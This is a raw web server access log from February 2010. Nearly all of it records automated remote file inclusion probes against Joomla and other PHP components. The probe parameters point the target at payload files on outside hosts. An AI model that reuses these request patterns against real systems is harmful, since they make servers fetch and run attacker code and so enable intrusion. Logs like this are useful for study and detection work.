66.230.221.15 - - [21/Feb/2010:08:36:57 -0800] "GET /logs/access_100207.log%20%20///components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:37:01 -0800] "GET /logs/access_100207.log%20%20///components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:37:35 -0800] "GET /logs/access_100205.log%20%20/admin/spaw/spaw_control.class.php?spaw_root=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:37:40 -0800] "GET /logs/access_100120.log%20%20/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:08:37:41 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:08:37:41 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:08:37:42 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:08:37:53 -0800] "GET /logs/access_100202.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:38:02 -0800] "GET /logs/access_100205.log%20%20/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [21/Feb/2010:08:38:06 -0800] "GET /twindow_cart.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [21/Feb/2010:08:38:06 -0800] "GET /logs/access_100123.log/twindow_cart.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [21/Feb/2010:08:38:06 -0800] "GET /logs/twindow_cart.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:08:38:08 -0800] "GET /logs/access_100202.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.249.65.121 - - [21/Feb/2010:08:39:02 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Googlebot-Image/1.0" "puaga.com"
66.249.65.105 - - [21/Feb/2010:08:39:02 -0800] "GET /simplepack/grader/i2/Download.png HTTP/1.1" 200 8288 "-" "Googlebot-Image/1.0" "puaga.com"
203.115.131.17 - - [21/Feb/2010:08:39:07 -0800] "GET /logs/access_100115.log/twindow_cart.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [21/Feb/2010:08:40:57 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [21/Feb/2010:08:40:57 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [21/Feb/2010:08:40:57 -0800] "GET /logs/access_100123.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.200.114 - - [21/Feb/2010:08:41:54 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.200.114 - - [21/Feb/2010:08:41:54 -0800] "GET /logs/access.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.200.114 - - [21/Feb/2010:08:41:54 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.200.114 - - [21/Feb/2010:08:42:24 -0800] "GET /logs/access_100123.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:27 -0800] "GET /logs/access_100111.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:27 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:27 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:27 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:27 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:27 -0800] "GET /logs/access_100111.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:30 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:30 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:30 -0800] "GET /logs/access_100111.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:34 -0800] "GET /logs/access_100207.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:34 -0800] "GET /logs/access_100207.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:08:43:35 -0800] "GET /logs/access_100207.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:08:43:51 -0800] "GET /skin/daerew_45galleryGD/setup.php?dir=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:08:43:51 -0800] "GET /logs//skin/daerew_45galleryGD/setup.php?dir=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:43:51 -0800] "GET /logs/access_100129.log///components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:08:43:51 -0800] "GET /logs/access_100205.log//skin/daerew_45galleryGD/setup.php?dir=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.35.138 - - [21/Feb/2010:08:44:10 -0800] "GET /logs/access_100111.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.35.138 - - [21/Feb/2010:08:44:19 -0800] "GET /logs/access_100206.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:08:44:41 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:08:44:41 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:08:44:41 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [21/Feb/2010:08:45:15 -0800] "GET /logs/access_100115.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [21/Feb/2010:08:45:20 -0800] "GET /logs/access.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:08:45:31 -0800] "GET /logs/access_100202.log///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:08:45:31 -0800] "GET /logs///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:08:45:31 -0800] "GET //?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:08:46:01 -0800] "GET /skin/daerew_45galleryGD/setup.php?dir=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:46:19 -0800] "GET /bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:46:19 -0800] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:46:19 -0800] "GET /logs/access_100205.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [21/Feb/2010:08:47:01 -0800] "GET /logs/access_100119.log//bbs/write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
85.13.200.114 - - [21/Feb/2010:08:47:12 -0800] "GET /logs/access_100115.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [21/Feb/2010:08:48:09 -0800] "GET /ideal/?N=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
82.179.244.69 - - [21/Feb/2010:08:48:59 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:08:48:59 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:08:48:59 -0800] "GET /logs/access_100123.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:08:49:03 -0800] "GET /logs/access_100119.log%20%20///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:08:49:04 -0800] "GET /logs///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:08:49:04 -0800] "GET //?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [21/Feb/2010:08:49:29 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.hanbit-pci.com/board/data/log/id1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [21/Feb/2010:08:49:29 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://www.hanbit-pci.com/board/data/log/id1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [21/Feb/2010:08:49:32 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://www.hanbit-pci.com/board/data/log/id1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.47.7.71 - - [21/Feb/2010:08:49:33 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.hanbit-pci.com/board/data/log/id1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:08:50:22 -0800] "GET /logs/access_100123.log%20%20///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:50:52 -0800] "GET /logs/access_100214.log/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:50:54 -0800] "GET /logs/access_100205.log/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.242.113.160 - - [21/Feb/2010:08:51:13 -0800] "GET /logs/access_100115.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:08:51:30 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:08:51:30 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:08:51:32 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:08:51:56 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:08:51:56 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:08:51:57 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:08:52:27 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:08:52:28 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:08:52:28 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:55:50 -0800] "GET /logs/access_100205.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:56:52 -0800] "GET /logs//?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:56:52 -0800] "GET /?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:56:56 -0800] "GET /logs/access_100118.log%20%20//?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.15.228 - - [21/Feb/2010:08:57:05 -0800] "GET /logs/access_100202.log%20%20///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:57:18 -0800] "GET /logs//?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:57:18 -0800] "GET /?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:57:24 -0800] "GET /logs/access_100118.log%20%20//?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:08:57:52 -0800] "GET /logs/access_100129.log///components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:08:57:59 -0800] "GET /atom.php5?page=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:08:57:59 -0800] "GET /logs//atom.php5?page=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:08:57:59 -0800] "GET /logs/access_100117.log//atom.php5?page=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:08:58:12 -0800] "GET /logs/access_100119.log///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:08:58:38 -0800] "GET /atom.php5?page=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:08:58:38 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:58:43 -0800] "GET /logs//?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:58:43 -0800] "GET /logs/access_100118.log//?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:58:44 -0800] "GET /?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:08:58:44 -0800] "GET /logs//atom.php5?page=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:58:52 -0800] "GET /logs/access_100126.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:08:59:35 -0800] "GET /logs/access_100114.log%20%20//atom.php5?page=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:08:59:35 -0800] "GET /logs/access_100123.log///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:08:59:35 -0800] "GET /logs/access_100117.log%20%20//atom.php5?page=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:08:59:47 -0800] "GET /logs/access_100207.log///components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:00:00 -0800] "GET /logs/access_100125.log//?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:00:01 -0800] "GET /logs//?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.0" 200 4931 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:00:01 -0800] "GET /?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:09:00:21 -0800] "GET /logs/access_100114.log%20%20//atom.php5?page=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:01:11 -0800] "GET /logs/access_100125.log%20%20//?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:09:01:55 -0800] "GET /logs/access_100125.log%20%20//?custompluginfile[]=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:03:03 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:03:03 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:03:03 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [21/Feb/2010:09:03:52 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://juryeclub.com/images/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:09:04:42 -0800] "GET /logs/access_100117.log//atom.php5?page=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:09:04:49 -0800] "GET /logs/access_100114.log///ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [21/Feb/2010:09:04:49 -0800] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.photomagic.co.kr/main/data/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
